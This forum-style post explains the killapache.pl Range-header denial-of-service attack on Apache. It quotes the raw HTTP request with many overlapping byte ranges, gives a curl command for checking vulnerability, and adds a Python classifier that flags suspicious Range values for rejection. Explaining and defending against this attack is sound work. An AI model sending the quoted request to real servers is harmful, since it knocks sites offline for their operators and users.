The killapache.pl script launches the following simple request in a few threads:
Quote:
GET / HTTP/1.1
Host: example.com
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,<...>,5-1299,5-1300
Accept-Encoding: gzip
Connection: close
And if there is no nginx installed, your Apache server will easily be brought down.
Here is a simple command to check if your server is vulnerable:
Quote:
curl -I -H "Range: bytes=0-1,0-2" -s yourserver.com/robots.txt | grep Partial
If you receive 206 Partial Content, you are in big trouble.
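
On the defensive side, the Range values shown above can be recognised before they reach Apache. The following is an added example, not part of the original post or of killapache.pl: a small classifier for Range header values, where the function name and the max_ranges threshold are assumptions chosen for illustration.

```python
import re

_SPEC = re.compile(r"^(\d*)-(\d*)$")  # "first-last", "first-" or suffix "-n"

def classify_range(header, max_ranges=10):
    """Return 'ok', 'malformed', 'too-many' or 'overlapping' for a Range value.

    max_ranges is an assumed policy threshold, not a value from the page.
    """
    unit, sep, specs = header.strip().partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return "malformed"
    spans = []
    parts = specs.split(",")
    for part in parts:
        m = _SPEC.match(part.strip())
        if not m or not (m.group(1) or m.group(2)):
            return "malformed"
        first, last = m.group(1), m.group(2)
        if not first:
            continue  # suffix range: position depends on the file size
        start = int(first)
        end = int(last) if last else float("inf")  # "5-" runs to end of file
        if end < start:
            return "malformed"  # e.g. "5-0": last byte before first byte
        spans.append((start, end))
    if len(parts) > max_ranges:
        return "too-many"
    spans.sort()
    # After sorting by start, any overlap shows up between neighbours.
    for (_, prev_end), (start, _) in zip(spans, spans[1:]):
        if start <= prev_end:
            return "overlapping"
    return "ok"

# Constructed sample values; the second and third reuse headers shown above.
SAMPLES = [
    "bytes=0-499",
    "bytes=0-1,0-2",
    "bytes=0-,5-0,5-1,5-2,5-3,5-4",
    "bytes=" + ",".join(f"{i * 10}-{i * 10 + 4}" for i in range(50)),
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(f"{classify_range(value):12} {value[:40]}")
```

Anything other than "ok" is a candidate for dropping the Range header or rejecting the request at the front end, since ordinary clients rarely send overlapping or malformed byte ranges.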